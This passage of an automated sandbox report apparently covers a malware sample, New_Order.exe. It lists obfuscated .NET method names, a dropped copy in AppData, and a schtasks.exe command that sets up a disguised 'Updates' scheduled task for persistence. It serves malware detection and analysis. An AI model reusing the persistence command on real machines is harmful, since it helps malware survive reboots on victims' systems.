            Source: 0.2.New_Order.exe.e150000.7.raw.unpack, DGgk8FJ1T9SQqJsR4v.csHigh entropy of concatenated method names: 'UJToeKKvdW', 'BidobkwfF9', 'HE2ocB9loE', 'rJ3otoiyIJ', 'lDUo12bNxK', 'cIZoBLICZT', 'Next', 'Next', 'Next', 'NextBytes'
            Source: 0.2.New_Order.exe.e150000.7.raw.unpack, bqmxolvPvPxiKNnaj2.csHigh entropy of concatenated method names: 'yPV81Xq4XY', 'N0y893QaIj', 'xt8851VtdI', 'L4p8022f60', 'oeD8MXmyV8', 'NDE8ODFEEY', 'sGR8VQtYLW', 'MYG8HWt0YJ', 'P5t8nW4cEC', 'P688s6qKaW'
            Source: 0.2.New_Order.exe.e150000.7.raw.unpack, DLCQ6qWPZ2npD2VK97c.csHigh entropy of concatenated method names: 'treGy1qibf', 'ybyGipLFXf', 'FRXGrUuCHE', 'vJjGFdmBGe', 'rt2GTs4Svq', 'sxnGKddxxe', 'e2NG3HvVJV', 'yDOGdnnM7D', 'I5tGD4QLqR', 'W5hGNoiLW7'
            Source: 0.2.New_Order.exe.e150000.7.raw.unpack, RsTPbKup2wq6YN65MQ.csHigh entropy of concatenated method names: 'OARYyxs9pg', 'gxhYi9vy10', 'RZUYrSRsHs', 'Gr2YFf1U75', 'qKBYT1vriX', 'VM9YK8sSkT', 'UvGY3x8yNV', 'VJIYd22uft', 'dJKYDOHfJM', 'SaxYNRkcHV'
            Source: 0.2.New_Order.exe.e150000.7.raw.unpack, goEE1epI6dHkIrNF1v.csHigh entropy of concatenated method names: 'XTEuFmx9Gb', 'JFRuK63C7a', 'HI1udFDKVp', 'F9nuDf9049', 'CvouqmoXL7', 'OixuS82yXG', 'R4buIQkajT', 'oFTuoWowAT', 'f04uGGZ1vl', 'GhYuX2CwSK'
            Source: 0.2.New_Order.exe.e150000.7.raw.unpack, oeaCEEWWlgoouEcLVPL.csHigh entropy of concatenated method names: 'ToString', 'nyWXRQDjhG', 'jmNX2aoZlN', 'd0SXJAjbJi', 'W93XwxKtpT', 'gZ8X8DaWW5', 'GToXu4hwH8', 'rq6XvqSN7t', 'ILg4krFXyPmSfIU5At6', 'uXdIpvFJ1AskUOf5PPn'
            Source: 0.2.New_Order.exe.e150000.7.raw.unpack, JPthFlW7Vq61JKub2YN.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'P4BX1wbtLb', 'E1nX9T8Hmy', 'xpKX5b1Si2', 'vpXX0D8hq7', 'p93XMJhcac', 'zUNXOkAOp7', 'tqVXVVrLxa'
            Source: 0.2.New_Order.exe.e150000.7.raw.unpack, nAjuhA9HsaZwFfDopo.csHigh entropy of concatenated method names: 'YDrRJRnu0B', 'X6IRwrbMju', 'u9ZR8MZ1Ml', 'LLcRupR7h1', 'he4RvtlTAJ', 't0lRpGrvc5', 'smiRYy0oob', 'upgRf5cVvv', 'UmxRhZpiVC', 'M6ZREG6lk6'
            Source: 0.2.New_Order.exe.e150000.7.raw.unpack, kycsHry1MAvVD8x7AF.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'HF3lnuYxld', 'N28lsw2m82', 'xM5lzqVlEg', 'DlnR73njkh', 'oIwRaEZ37C', 'llPRlDA8mK', 'LtpRRjuH9D', 'ElSrrCsFPAokaWPooEy'
            Source: 0.2.New_Order.exe.e150000.7.raw.unpack, BGayaGs6fsYETrsyVi.csHigh entropy of concatenated method names: 'futow8K3Ls', 'aqao8D1Hop', 'gblousriNU', 'vDrovws9PO', 'MSrop4uEJA', 'PJroYtnjRy', 'UYCofkXlpx', 'J31ohuGTBQ', 'CiSoEQOWWu', 'CO3o6Qs2PE'
            Source: 0.2.New_Order.exe.e150000.7.raw.unpack, PpqMW0zQO4To1KIirG.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'BgIGmiWxxW', 'nCHGqVU4qu', 'zC1GSdTMAO', 'flmGIaJtaM', 'IgvGo8kAwL', 'reDGGDp0ZO', 'xn5GXIMZFf'
            Source: 0.2.New_Order.exe.e150000.7.raw.unpack, uCptQ5ciPt496xv8vt.csHigh entropy of concatenated method names: 'hXbmdjRLTZ', 'yLtmDl9cEE', 'gB2meKIsbO', 'HCImbjoe6h', 'XZomtcHPFX', 'ID0mB1dPVp', 'MyamUFE7Jt', 'vAxmCAcqip', 'aYlmPKnbgx', 'kQemkKFAkH'
            Source: 0.2.New_Order.exe.e150000.7.raw.unpack, cjohpB6F4qCJl6on6W.csHigh entropy of concatenated method names: 'lA5pJS0LRu', 'hp1p8Nc1Y1', 'fsupvEAD5k', 'RBWpY7y6rk', 'zlxpfcA3CU', 'nfQvMGS2sX', 'BJ2vOsaSYN', 'yNJvVUXcUU', 'S90vHDT8jx', 'Sv9vnpBcqK'
            Source: 0.2.New_Order.exe.e150000.7.raw.unpack, JVlQPXD8IYlAL4iUQc.csHigh entropy of concatenated method names: 'Dv4rraFNn', 'voPFbtwdW', 'UvVK9qeR6', 'pUj3cI0NO', 'D9kD5xJkY', 'O1JNps6W5', 'CO3ClfVCm0X4UvJSFV', 'B1lVClm1YRM0DhwkwZ', 'uqtowpqGY', 'd9cXWQAwm'
            Source: 0.2.New_Order.exe.e150000.7.raw.unpack, oNamifxUxiguxbJyhK.csHigh entropy of concatenated method names: 'M7HYwJF8wf', 'CXeYu4WbND', 'Kt3YpiVxwE', 'biNpsudPdY', 'wQkpzerklC', 'xJcY7yTeWp', 'a8wYanoCau', 'owCYlubRUO', 'vasYRhg7RU', 'iJIY2vClc1'
            Source: 0.2.New_Order.exe.e150000.7.raw.unpack, mrtCjLogu3Q1DWWwjP.csHigh entropy of concatenated method names: 'oJgIE74c2n', 'dPBI6bi5Kl', 'ToString', 'LSbIw7Ilmu', 'kOcI85YsXH', 'f1ZIujjvZ8', 'cb7IvIInwh', 'Y9IIpqIucv', 'D0BIY8N37O', 'xk7IfDZZuK'
            Source: 0.2.New_Order.exe.e150000.7.raw.unpack, vSFpnK0N05eGXfNOef.csHigh entropy of concatenated method names: 'HX3pxMP5h8', 'PEXpyGFJvK', 'qg8prGTofX', 'eGIpFg4gDq', 'KVUpKtpNLJ', 'OoQp3oN4cK', 'APApDcmgNA', 'Sq7pNw0wTr', 'EfaqlWf56atJmatGjZ3', 'uClRYDfnAyy9x8GicqC'
            Source: 0.2.New_Order.exe.e150000.7.raw.unpack, W9P0rCRK819M9K77jS.csHigh entropy of concatenated method names: 'Dispose', 'h5tanb8iRa', 'Naclbva9MO', 'kvs449HdxN', 'D29aslHuZN', 'G84azrVM1e', 'ProcessDialogKey', 'oRvl7OJx5o', 'KWBlaRcPNf', 'JDhllRbWCX'
            Source: 0.2.New_Order.exe.e150000.7.raw.unpack, BeOUOrEKdOwVEsyIEg.csHigh entropy of concatenated method names: 'pPZIHgfWY1', 'j1LIsDDJKP', 'DEbo7qDIyL', 'MUGoaO3rcN', 'KuaIkEnrW0', 'Uu5ILUB6Ib', 'CmuIggg5Be', 'ydTI12Wknx', 'DQkI9YtWMT', 'XPJI5DwhHd'
            Source: 0.2.New_Order.exe.e150000.7.raw.unpack, gHsRsfwrrRYNVGAThQ.csHigh entropy of concatenated method names: 'G5xGadhA9l', 'EGQGR8ZBAV', 'iHZG2Rjf7J', 'P3eGwwRrkN', 'qRUG8OpZH7', 'BFFGvNnmIQ', 'p5CGp9Gf0Z', 'Sx9oVG3SXw', 'm7KoHNDPR3', 'nZbon2AbM1'
            Source: 0.2.New_Order.exe.e150000.7.raw.unpack, WragX5NZaA88Oi9VWc.csHigh entropy of concatenated method names: 'Af0aY7nb5N', 'kvXafHCpZk', 'Yf5aEO4LIh', 'foYa69bYyr', 'LssaqW0eSE', 'sJJaSthxW4', 'RFGX6EHma6QWE0w37B', 'xWhoi4QRg1w5CD4DcA', 'WNeaaZ87kA', 'XpqaRYAnpp'
            Source: 0.2.New_Order.exe.e150000.7.raw.unpack, w9NgRwSLiBUB45BpqD.csHigh entropy of concatenated method names: 'I2vvTrK7Po', 'oGZv3A877E', 'CqPucmIBNk', 'z3IutLtYlJ', 'hh9uB1DfBi', 'WjCuQ6sOgy', 'hGRuUllgEJ', 'RCnuCW6kcn', 'm7oujmBNnt', 'E5nuPJvjrL'
            Source: 11.2.QjSljS.exe.36e2220.3.raw.unpack, DGgk8FJ1T9SQqJsR4v.csHigh entropy of concatenated method names: 'UJToeKKvdW', 'BidobkwfF9', 'HE2ocB9loE', 'rJ3otoiyIJ', 'lDUo12bNxK', 'cIZoBLICZT', 'Next', 'Next', 'Next', 'NextBytes'
            Source: 11.2.QjSljS.exe.36e2220.3.raw.unpack, bqmxolvPvPxiKNnaj2.csHigh entropy of concatenated method names: 'yPV81Xq4XY', 'N0y893QaIj', 'xt8851VtdI', 'L4p8022f60', 'oeD8MXmyV8', 'NDE8ODFEEY', 'sGR8VQtYLW', 'MYG8HWt0YJ', 'P5t8nW4cEC', 'P688s6qKaW'
            Source: 11.2.QjSljS.exe.36e2220.3.raw.unpack, DLCQ6qWPZ2npD2VK97c.csHigh entropy of concatenated method names: 'treGy1qibf', 'ybyGipLFXf', 'FRXGrUuCHE', 'vJjGFdmBGe', 'rt2GTs4Svq', 'sxnGKddxxe', 'e2NG3HvVJV', 'yDOGdnnM7D', 'I5tGD4QLqR', 'W5hGNoiLW7'
            Source: 11.2.QjSljS.exe.36e2220.3.raw.unpack, RsTPbKup2wq6YN65MQ.csHigh entropy of concatenated method names: 'OARYyxs9pg', 'gxhYi9vy10', 'RZUYrSRsHs', 'Gr2YFf1U75', 'qKBYT1vriX', 'VM9YK8sSkT', 'UvGY3x8yNV', 'VJIYd22uft', 'dJKYDOHfJM', 'SaxYNRkcHV'
            Source: 11.2.QjSljS.exe.36e2220.3.raw.unpack, goEE1epI6dHkIrNF1v.csHigh entropy of concatenated method names: 'XTEuFmx9Gb', 'JFRuK63C7a', 'HI1udFDKVp', 'F9nuDf9049', 'CvouqmoXL7', 'OixuS82yXG', 'R4buIQkajT', 'oFTuoWowAT', 'f04uGGZ1vl', 'GhYuX2CwSK'
            Source: 11.2.QjSljS.exe.36e2220.3.raw.unpack, oeaCEEWWlgoouEcLVPL.csHigh entropy of concatenated method names: 'ToString', 'nyWXRQDjhG', 'jmNX2aoZlN', 'd0SXJAjbJi', 'W93XwxKtpT', 'gZ8X8DaWW5', 'GToXu4hwH8', 'rq6XvqSN7t', 'ILg4krFXyPmSfIU5At6', 'uXdIpvFJ1AskUOf5PPn'
            Source: 11.2.QjSljS.exe.36e2220.3.raw.unpack, JPthFlW7Vq61JKub2YN.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'P4BX1wbtLb', 'E1nX9T8Hmy', 'xpKX5b1Si2', 'vpXX0D8hq7', 'p93XMJhcac', 'zUNXOkAOp7', 'tqVXVVrLxa'
            Source: 11.2.QjSljS.exe.36e2220.3.raw.unpack, nAjuhA9HsaZwFfDopo.csHigh entropy of concatenated method names: 'YDrRJRnu0B', 'X6IRwrbMju', 'u9ZR8MZ1Ml', 'LLcRupR7h1', 'he4RvtlTAJ', 't0lRpGrvc5', 'smiRYy0oob', 'upgRf5cVvv', 'UmxRhZpiVC', 'M6ZREG6lk6'
            Source: 11.2.QjSljS.exe.36e2220.3.raw.unpack, kycsHry1MAvVD8x7AF.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'HF3lnuYxld', 'N28lsw2m82', 'xM5lzqVlEg', 'DlnR73njkh', 'oIwRaEZ37C', 'llPRlDA8mK', 'LtpRRjuH9D', 'ElSrrCsFPAokaWPooEy'
            Source: 11.2.QjSljS.exe.36e2220.3.raw.unpack, BGayaGs6fsYETrsyVi.csHigh entropy of concatenated method names: 'futow8K3Ls', 'aqao8D1Hop', 'gblousriNU', 'vDrovws9PO', 'MSrop4uEJA', 'PJroYtnjRy', 'UYCofkXlpx', 'J31ohuGTBQ', 'CiSoEQOWWu', 'CO3o6Qs2PE'
            Source: 11.2.QjSljS.exe.36e2220.3.raw.unpack, PpqMW0zQO4To1KIirG.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'BgIGmiWxxW', 'nCHGqVU4qu', 'zC1GSdTMAO', 'flmGIaJtaM', 'IgvGo8kAwL', 'reDGGDp0ZO', 'xn5GXIMZFf'
            Source: 11.2.QjSljS.exe.36e2220.3.raw.unpack, uCptQ5ciPt496xv8vt.csHigh entropy of concatenated method names: 'hXbmdjRLTZ', 'yLtmDl9cEE', 'gB2meKIsbO', 'HCImbjoe6h', 'XZomtcHPFX', 'ID0mB1dPVp', 'MyamUFE7Jt', 'vAxmCAcqip', 'aYlmPKnbgx', 'kQemkKFAkH'
            Source: 11.2.QjSljS.exe.36e2220.3.raw.unpack, cjohpB6F4qCJl6on6W.csHigh entropy of concatenated method names: 'lA5pJS0LRu', 'hp1p8Nc1Y1', 'fsupvEAD5k', 'RBWpY7y6rk', 'zlxpfcA3CU', 'nfQvMGS2sX', 'BJ2vOsaSYN', 'yNJvVUXcUU', 'S90vHDT8jx', 'Sv9vnpBcqK'
            Source: 11.2.QjSljS.exe.36e2220.3.raw.unpack, JVlQPXD8IYlAL4iUQc.csHigh entropy of concatenated method names: 'Dv4rraFNn', 'voPFbtwdW', 'UvVK9qeR6', 'pUj3cI0NO', 'D9kD5xJkY', 'O1JNps6W5', 'CO3ClfVCm0X4UvJSFV', 'B1lVClm1YRM0DhwkwZ', 'uqtowpqGY', 'd9cXWQAwm'
            Source: 11.2.QjSljS.exe.36e2220.3.raw.unpack, oNamifxUxiguxbJyhK.csHigh entropy of concatenated method names: 'M7HYwJF8wf', 'CXeYu4WbND', 'Kt3YpiVxwE', 'biNpsudPdY', 'wQkpzerklC', 'xJcY7yTeWp', 'a8wYanoCau', 'owCYlubRUO', 'vasYRhg7RU', 'iJIY2vClc1'
            Source: 11.2.QjSljS.exe.36e2220.3.raw.unpack, mrtCjLogu3Q1DWWwjP.csHigh entropy of concatenated method names: 'oJgIE74c2n', 'dPBI6bi5Kl', 'ToString', 'LSbIw7Ilmu', 'kOcI85YsXH', 'f1ZIujjvZ8', 'cb7IvIInwh', 'Y9IIpqIucv', 'D0BIY8N37O', 'xk7IfDZZuK'
            Source: 11.2.QjSljS.exe.36e2220.3.raw.unpack, vSFpnK0N05eGXfNOef.csHigh entropy of concatenated method names: 'HX3pxMP5h8', 'PEXpyGFJvK', 'qg8prGTofX', 'eGIpFg4gDq', 'KVUpKtpNLJ', 'OoQp3oN4cK', 'APApDcmgNA', 'Sq7pNw0wTr', 'EfaqlWf56atJmatGjZ3', 'uClRYDfnAyy9x8GicqC'
            Source: 11.2.QjSljS.exe.36e2220.3.raw.unpack, W9P0rCRK819M9K77jS.csHigh entropy of concatenated method names: 'Dispose', 'h5tanb8iRa', 'Naclbva9MO', 'kvs449HdxN', 'D29aslHuZN', 'G84azrVM1e', 'ProcessDialogKey', 'oRvl7OJx5o', 'KWBlaRcPNf', 'JDhllRbWCX'
            Source: 11.2.QjSljS.exe.36e2220.3.raw.unpack, BeOUOrEKdOwVEsyIEg.csHigh entropy of concatenated method names: 'pPZIHgfWY1', 'j1LIsDDJKP', 'DEbo7qDIyL', 'MUGoaO3rcN', 'KuaIkEnrW0', 'Uu5ILUB6Ib', 'CmuIggg5Be', 'ydTI12Wknx', 'DQkI9YtWMT', 'XPJI5DwhHd'
            Source: 11.2.QjSljS.exe.36e2220.3.raw.unpack, gHsRsfwrrRYNVGAThQ.csHigh entropy of concatenated method names: 'G5xGadhA9l', 'EGQGR8ZBAV', 'iHZG2Rjf7J', 'P3eGwwRrkN', 'qRUG8OpZH7', 'BFFGvNnmIQ', 'p5CGp9Gf0Z', 'Sx9oVG3SXw', 'm7KoHNDPR3', 'nZbon2AbM1'
            Source: 11.2.QjSljS.exe.36e2220.3.raw.unpack, WragX5NZaA88Oi9VWc.csHigh entropy of concatenated method names: 'Af0aY7nb5N', 'kvXafHCpZk', 'Yf5aEO4LIh', 'foYa69bYyr', 'LssaqW0eSE', 'sJJaSthxW4', 'RFGX6EHma6QWE0w37B', 'xWhoi4QRg1w5CD4DcA', 'WNeaaZ87kA', 'XpqaRYAnpp'
            Source: 11.2.QjSljS.exe.36e2220.3.raw.unpack, w9NgRwSLiBUB45BpqD.csHigh entropy of concatenated method names: 'I2vvTrK7Po', 'oGZv3A877E', 'CqPucmIBNk', 'z3IutLtYlJ', 'hh9uB1DfBi', 'WjCuQ6sOgy', 'hGRuUllgEJ', 'RCnuCW6kcn', 'm7oujmBNnt', 'E5nuPJvjrL'
            Source: C:\Users\user\Desktop\New_Order.exeFile created: C:\Users\user\AppData\Roaming\QjSljS.exeJump to dropped file

            Boot Survival

            barindex
            Uses schtasks.exe or at.exe to add and modify task schedules
            Source: C:\Users\user\Desktop\New_Order.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\QjSljS" /XML "C:\Users\user\AppData\Local\Temp\tmpBC11.tmp
            Source: C:\Users\user\Desktop\New_Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
